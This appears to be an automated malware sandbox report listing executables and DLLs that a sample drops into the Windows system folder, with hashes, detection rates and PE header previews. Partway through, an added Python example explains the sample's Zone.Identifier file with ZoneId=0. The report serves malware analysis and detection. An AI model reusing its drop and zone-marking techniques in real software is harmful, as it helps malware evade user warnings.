                          SHA-512:0C058623C2E935E013D5867A58AD814F41D38369EA90FDE3E783D678D06024F5B1DD2DFEAE9CE9BF70CC442FCEF6EC1EEE6A2D3AC96445D3090189B298E51ACF
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:modified
                          Size (bytes):6657
                          Entropy (8bit):2.8859070814843144
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10P6/B+BDq9J5SV3DY:CSVVEPozmB7F6/B+FqX5S1D
                          MD5:67B1FF9356941F205A17BEF688D68477
                          SHA1:68409BFB4DD044C52C2E5EEF664B7C42189ABD59
                          SHA-256:06C33A515B36B6FC805F55790BA0CCCF9D64C15C321760B5732647E28BA0346C
                          SHA-512:396B13E5966E5C66CD6B34F20BF5A292CA7E4D108ED06F2D06D088E0E3242E65490003B924C0A0A6BC712BF9AEA5224CE759137A89841F0E5F369DA27B6FD26A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Oglabl32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858663166842526
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10M/B+BDq9J5SV3DY:CSVVEPozmB7K/B+FqX5S1D
                          MD5:772F4DDB505F23FDD3DA9F62D9332927
                          SHA1:F31CB7824BE0F5200BF0C751CD188DC9B2512566
                          SHA-256:F3030FA2CED9FDBB4DD104E57BAF9BFE4ABE6930FA0EB2A59E71332B6ABEF5C4
                          SHA-512:6C7B206D57C86322DD7300F4EACECD4CE0FDACE71025A3EC5FEB8E64777CABA88D408D2DE12921D01E36D47E2E54D4CF75D8B0776E69B486A0376928848E598C
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Onkcje32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885596352101298
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10wB+BDq9J5SV3DY:CSVVEPozmB7eB+FqX5S1D
                          MD5:AC75014F9EA9F86B2D79607E479F8240
                          SHA1:EE861D13708D82445F6BE60FE63EEC4600D41CE7
                          SHA-256:5B9F6BEB2C0F622486F8D78C266B6ADAEBB9BF85D1B16CBFEAE5BC9DA93AE33F
                          SHA-512:8DF9AEEB0E0AF98F879839AA19EEB3C556344B631B79BE2DE3019723DEB5581DF63C57E298C3821D039E1AA8B644131AE1683A1DA864E01A83F0230C8F40599F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Edgbhcim.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8856603370560716
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU100B+BDq9J5SV3DY:CSVVEPozmB7OB+FqX5S1D
                          MD5:06D813D816B926989AEFF79806F6D076
                          SHA1:791ADB92261CFD1B651C41F089DA38791E30FDE8
                          SHA-256:A6377AF564D5F8CFB8FF365BC83535349A70A6ED524BA15C20F90DC3F3A8B445
                          SHA-512:AEE153AB5D6F57A3BBB2F490C216E2C06FAC83B4C5DD4992E108C762DA43ADA46C2A88CCF4985BB2834945A0701269842570E912E5327BB6B9B6BF2D986E68FB
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Qgcpihjl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.88523084802412
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU105B+BDq9J5SV3DY:CSVVEPozmB77B+FqX5S1D
                          MD5:B8B687E5C4A375DD34CFFDD1BC8EA223
                          SHA1:D6D4E5273E6A27E3A67B156F2FAAEFCD3A13CF97
                          SHA-256:C53A2F28EFF830CECB4D44FA0AA562836213173C471CCF0CA6F19F7EF10B44D9
                          SHA-512:63D42BCE806CC0C4ED5A4998B9294FAC226BD6AD6397F8B550590A981AF7894D1E7421D422A20ADFA7F7FCF6C8625D55700E505251627E9E7A85F7FBC4DF6B4A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Eoappk32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8866255630560382
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10eUB+BDq9J5SV3DY:CSVVEPozmB78UB+FqX5S1D
                          MD5:0892D63580EC00EC3AA968ED2EDB065E
                          SHA1:F04403EF04B89372D08B6EA2A08F9CF93078ACC5
                          SHA-256:12D88A4867FCD7D99AA4AFFC6BE6728D7DE67A6815E62FD2E8AAA5DD04EB0673
                          SHA-512:77455E67BFC05AB2D34A67E1DD95F3A8365D609BBE3988BB72E9030B82C23289C829820C1162BB7FCEDBD4E97AA91CCE4456FA32CC9D7C59469985AB3C573BC2
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Plbmqa32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861660553601896
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10KMB+BDq9J5SV3DY:CSVVEPozmB70MB+FqX5S1D
                          MD5:2BE4FC3710E3BE149FAB6EF818C21EA7
                          SHA1:8669EF290A7719B940173DFFAE1503781BC5D77B
                          SHA-256:89412D437E442998934D6D5F12577F492D97B6310DF52B67C2BA10C82030AB00
                          SHA-512:5DF4B99435FDD2D7991A7716AA82CD6E1105ED6FB87D645957E7578CEDA9A0A6D5F217C96F5F2B159E216A132AE13B45E3F2ABA6A3A86460A3F5F1D340799693
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 89%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Bqjacldl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8854985134492592
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10yB+BDq9J5SV3DY:CSVVEPozmB7YB+FqX5S1D
                          MD5:A16432C6BFB3A06428BD8B24CB23307E
                          SHA1:ECABE2C3478DFE3D1C5E9317A086177FB770D9B0
                          SHA-256:CC5712C0C85A3206DE50863AEC2022854F89CD13BB750C823E2E567C364DE8FA
                          SHA-512:64433BF750232C8D9FB6D96CF55BE5F82F724D941012FCD97EBDF0DCFB8636B65EDA5DE57F053096B36C09606556BD91AF3CB6DB3A77F37B19B3667ECC2AD786
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Olijjb32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885337620948508
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10qB+BDq9J5SV3DY:CSVVEPozmB7IB+FqX5S1D
                          MD5:967CD38BCD25E3A55FEBBCCAE5FAF052
                          SHA1:F330DAC769F0F4598A17155145C801AE43268E2A
                          SHA-256:E0C9DFE969C7C75A82DBCB452CCD507EFFFAFC9E9AFBACE94AE3CA82990EA6F4
                          SHA-512:0052BB63DD0651957F8B69C647445E9BDBF9665860C187BA1C750822C57FCF24D98D1E8CD62EE7EF3A7A4FB3B5AF3D6F220171D632CC38D18A1E399F97EC98AA
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Bmlhnnne.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885915616346283
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10BB+BDq9J5SV3DY:CSVVEPozmB7HB+FqX5S1D
                          MD5:953DE6B8919B6B8F13BF6701F5B7F6BB
                          SHA1:9BF0CADD8E11A8356A364A23CC0571E0D36D58C8
                          SHA-256:C13C45DFA17FD6EA8E009C1AFECDAD046B7A3C79CAC55E2CDEF6C05D1F49D3A5
                          SHA-512:33773C98B501D8ED611D5323D2EFF34A6976214BA9E6A37E2E3F77D98647AFDBD5964AA6135366048F3CE21658811BDD7BB76A496BCA10B3267AFE128F780180
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.029371798942588
                          Encrypted:false
                          SSDEEP:3072:C9YQqNMGFWWbvbe3z11111111csxICREXdXNKT1ntPG9poDrFDHZtOgl:hQqNMzz111111111HCN9Otopg5tTl
                          MD5:0603E4CBD8760D07DD7DCAB05A92238A
                          SHA1:597FDCB8EBFC258FB014BE6F06F824C161F90785
                          SHA-256:85DE77A21C40364383D0CD6E05D6A1CCD7013F395A40F51DA79495AAC80AF916
                          SHA-512:8998895ADC2CEA78F3FE64C37A6D460A10066FEB146915315D1DC1CADABEFB0B0E39994290CCA14F5659F7CC13D34776635FC657714EEAA63EA91A75142522CC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
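The 26-byte file above is a Zone.Identifier stream written by the sample itself, with ZoneId=0 (the Local Machine zone) rather than the ZoneId=3 that a browser or mail client would set on an Internet download. The following is an added example, not part of the Joe Sandbox report: it recomputes the report's 8-bit entropy from the preview and parses the zone value. The report describes the file as ASCII with CRLF terminators and previews it as "[ZoneTransfer]....ZoneId=0" (non-printables as dots); two byte layouts fit that, so both are listed as constructed candidates and the report's MD5 is the check that separates them. The names REPORTED, CANDIDATES, shannon_entropy, zone_id and check_candidate are this example's own.

```python
"""Reproduce the reported entropy of the dropped Zone.Identifier stream and
parse its ZoneId. Added example; not part of the Joe Sandbox report."""
import hashlib
import math
from collections import Counter

# Values copied from the report record above.
REPORTED = {
    "size": 26,
    "entropy": 3.95006375643621,
    "md5": "187F488E27DB4AF347237FE461A079AD",
}

# Constructed candidates for the exact bytes. Both are 26 bytes of ASCII with
# CRLF terminators and the same byte multiset, so they share one entropy;
# only the MD5 comparison below can say which one the sandbox saw.
CANDIDATES = {
    # the layout Windows itself writes to a Zone.Identifier ADS
    "canonical": b"[ZoneTransfer]\r\nZoneId=0\r\n",
    # four non-printables between the fields and none trailing, as the preview
    # dots suggest when read one dot per byte
    "preview-literal": b"[ZoneTransfer]\r\n\r\nZoneId=0",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the figure sandboxes report."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zone_id(data: bytes):
    """Return the integer ZoneId from a Zone.Identifier stream, or None.
    0 = Local Machine, 1 = Intranet, 2 = Trusted, 3 = Internet, 4 = Restricted."""
    for line in data.decode("ascii", "replace").splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "ZoneId" and value.strip().isdigit():
            return int(value.strip())
    return None


def check_candidate(data: bytes) -> dict:
    """Compare one candidate byte string against the reported size, entropy
    and MD5, and extract its zone. MD5 is used only as a fingerprint here."""
    digest = hashlib.md5(data, usedforsecurity=False).hexdigest().upper()
    return {
        "size_ok": len(data) == REPORTED["size"],
        "entropy_ok": abs(shannon_entropy(data) - REPORTED["entropy"]) < 1e-9,
        "md5_ok": digest == REPORTED["md5"],
        "zone_id": zone_id(data),
    }


if __name__ == "__main__":
    for name, data in CANDIDATES.items():
        print(f"{name:16s} {check_candidate(data)}")
```

Both candidates reproduce the size and the entropy to all reported digits, which confirms the character multiset; whichever candidate reports md5_ok as True is the byte-exact content. A ZoneId of 0 on a file that the sample dropped means downstream "Mark of the Web" checks (SmartScreen prompts, Office Protected View) treat it as local, so the marker is worth recording alongside the PE drops when building detections.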
                          Process:C:\Windows\SysWOW64\Fhedeo32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861197809233476
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10dB+BDq9J5SV3DY:CSVVEPozmB7bB+FqX5S1D
                          MD5:B5068E654411D8D8F378AAE95E250E2D
                          SHA1:C239A9BA1967C3EF60486241A00F0F68D8C7E8A2
                          SHA-256:5C5BF61003FF3E3D94F5B51F2DA73D93C2D2B3DCD50E278E671E780F4834A942
                          SHA-512:FFFB4CD09906BBCE7CDDF58808B20437B809A81C54356CD718EB9D2E26529F6D4B4721D9CB7794D34DF6B0F09EFE76ACE512EF279AB0670DABC7909D61A78726
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Oeanchcn.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.02913940748877
                          Encrypted:false
                          SSDEEP:3072:veCGS2NqCREXdXNKT1ntPG9poDrFDHZtOgl:v/GS2NpCN9Otopg5tTl
                          MD5:1DB24B47BF090833A70E0BEA68A38D9F
                          SHA1:CB716EA372AF8307F8E34E235B12A6B1505F20CE
                          SHA-256:54607325797E16B65C4172CC2434B46F3A03D07C4DBE131CF0150EF9B2997682
                          SHA-512:5A4FA7D222BD6768500C5C49B56F0407FB765BC2D65BA2E34A1802F1C2F0862A485BAF41EFC144A4964FC473EC203B26A75D613F22649BB7BAFFD9058E2DFDD5
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Onkcje32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.030181619844008
                          Encrypted:false
                          SSDEEP:3072:HXhu4T4iOCREXdXNKT1ntPG9poDrFDHZtOgl:xT4ilCN9Otopg5tTl
                          MD5:A30DE8FF39A8563F2D7B9E36AD05A4C6
                          SHA1:7DDE7EC0FB55D6B6FF6224047F657DE638F19830
                          SHA-256:157AD38CD9398D3E4417DFCDEFB34ACC4D64CC6FA2A2F0233A5623A0ADC0ED23
                          SHA-512:9D551C50695FEC873872BDB4E2FF2CAC308C9FACDE2A06C0B6B499041BE8ECC52FF7775E7B675018BB224161224516F56F8923017B7C417674F3EAE00675A3E4
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Olijjb32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.980910405679068
                          Encrypted:false
                          SSDEEP:3072:VkEnKvTQLd6CREXdXNKT1ntPG9poDrFDHZtOgl:VbK7C5CN9Otopg5tTl
                          MD5:1B2425A45E8ED6237FBE4E56F276A504
                          SHA1:13A669539D2E4EB49158373ED9DAE15B7CBEE095
                          SHA-256:E7FFCF839DE32DA0E59DC1892EC5E731FCDDA66BC09B882F74FC6683E2FC6092
                          SHA-512:C36C85039EA4C266FCFBB0FFF2AE24E5170E6977DF174679597EF78C07B7EDA99DC3DCC333407E6133DA4DDD3C88379EB3110D6B80D97BDDDD2E8EA9A6EF0FB6
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Nejhbi32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.038961167963333
                          Encrypted:false
                          SSDEEP:3072:F2/KBOdlr+ZcPHCREXdXNKT1ntPG9poDrFDHZtOgl:BBklrUcPiCN9Otopg5tTl
                          MD5:B9761DC0E2D962AEFE92F6E1F3C1F250
                          SHA1:260E38D113176FB2AE58B815BDE7B74A8E573AF6
                          SHA-256:847C160CDF5687852BF745FFF41FE02222CCAF249274412E3F20D9D2E43DEB2C
                          SHA-512:DB0E956791ED2B1BFE243AFC3D4205EE0E8FFED18F2B43BF09DEB350405951A6157578E8F7A3FB58682420417CBC9884C92DEFE9A1944E24BBD3A0CED9CFF1DD
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Opbieagi.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.026913608034047
                          Encrypted:false
                          SSDEEP:3072:CxmLxblMzKEkL1FCREXdXNKT1ntPG9poDrFDHZtOgl:DdblaKD1wCN9Otopg5tTl
                          MD5:EB5F811B6A66908B38FB889817D5988F
                          SHA1:957F7C45E8B4439E6757BC6D80278C8E54CF43C4
                          SHA-256:62CAB9F10A7B07FD9486C89F2D4123AA954015A0EDBAFC364D5EF962099F41DA
                          SHA-512:62DCD4343511C0AE70C468A2587A0E062925799C0859F926723D1F4E94BC5AE0AA5B7F26E92B955AA0147FF7A5B3D670978F2F4201ED077158FD52259E1B8E67
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Odekfoij.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.980332951555747
                          Encrypted:false
                          SSDEEP:3072:6eBBxNNDjTTC4dYBCREXdXNKT1ntPG9poDrFDHZtOgl:6eDxNNDXe420CN9Otopg5tTl
                          MD5:AF41FAF03E8EAED376F154722746385B
                          SHA1:3C8D4BF7665EAA38019E91E719F95FC6C117C782
                          SHA-256:85B64BBFB21E2B7EAC68EE25F8EBED507276D1A8967EF17A455720793E4ECA18
                          SHA-512:67A6B37ADED237E91AC42DDDCF37BB86C02DF13021B4FD02734FBC8E3CBED7F97BBF11B7EE98765699D714A6F77B899D14563821A64339B14FDC88699D45654A
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Oglabl32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.983722913645044
                          Encrypted:false
                          SSDEEP:3072:Wmm/c0pnz7zrCREXdXNKT1ntPG9poDrFDHZtOgl:WmP0pnz7zeCN9Otopg5tTl
                          MD5:6E56FF877D11D4ED11AF106FBDDD4ACE
                          SHA1:0381230571396978F0A3D0736785AEE01D79BAA6
                          SHA-256:0741FB62D451ACA4432D1FA60F8EFE40C330C569D25D516FEE06138BD294678A
                          SHA-512:C3A6A71BED9905D926C82708C194DE094A2D52F59BDC5487DB55D04C00D88BB3B293B25FC7D5CAE3CE5D7725B0EE69156B44F9E87A86833B8C50A0FBD0441275
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Oceoll32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.021146031213954
                          Encrypted:false
                          SSDEEP:3072:FPHqRVNY68QvbuScCREXdXNKT1ntPG9poDrFDHZtOgl:u+683STCN9Otopg5tTl
                          MD5:7862075539A938767C526CCB7DF7CF4E
                          SHA1:6BE48DAB7AF44E69A9E17F1531740CD9CD5786C4
                          SHA-256:06B4319BD65DD7ACA5915F71D5D11941D784FEA0FD1EFD7A76E0F1050A4A0E38
                          SHA-512:B0DECF7C0F2EC3E94135DA1FD192CB9CBDEEB4871D1402E8BD6A1E3D474BAE23D658392BC21348E267149EA4381ADF7BA4CD21070478363E2E850B6257DC5328
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Ogjdllpi.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.967699551580477
                          Encrypted:false
                          SSDEEP:3072:ImNapHU/2FrfOJCREXdXNKT1ntPG9poDrFDHZtOgl:IZ2/2Q8CN9Otopg5tTl
                          MD5:04F64BB1853F025B09D78A47FA5C7F7B
                          SHA1:376C16590F5F0AEF5E8F91A5856C8D9E7C65DC1F
                          SHA-256:730126DAEDDC08C048D1B9F4777CB3F9E826DBCB0F7F2D4BC9F1B878AC0C1E6E
                          SHA-512:D00F594EFF2CCB2BAAB2087201DB5CF19CB994612D4768E4676E5B9A8FA67E8D83FF9A17843B3EDD745E252D6AD02F7CFA2D2A9DDFA0C851C737073CD0FCD7CD
                          Malicious:true
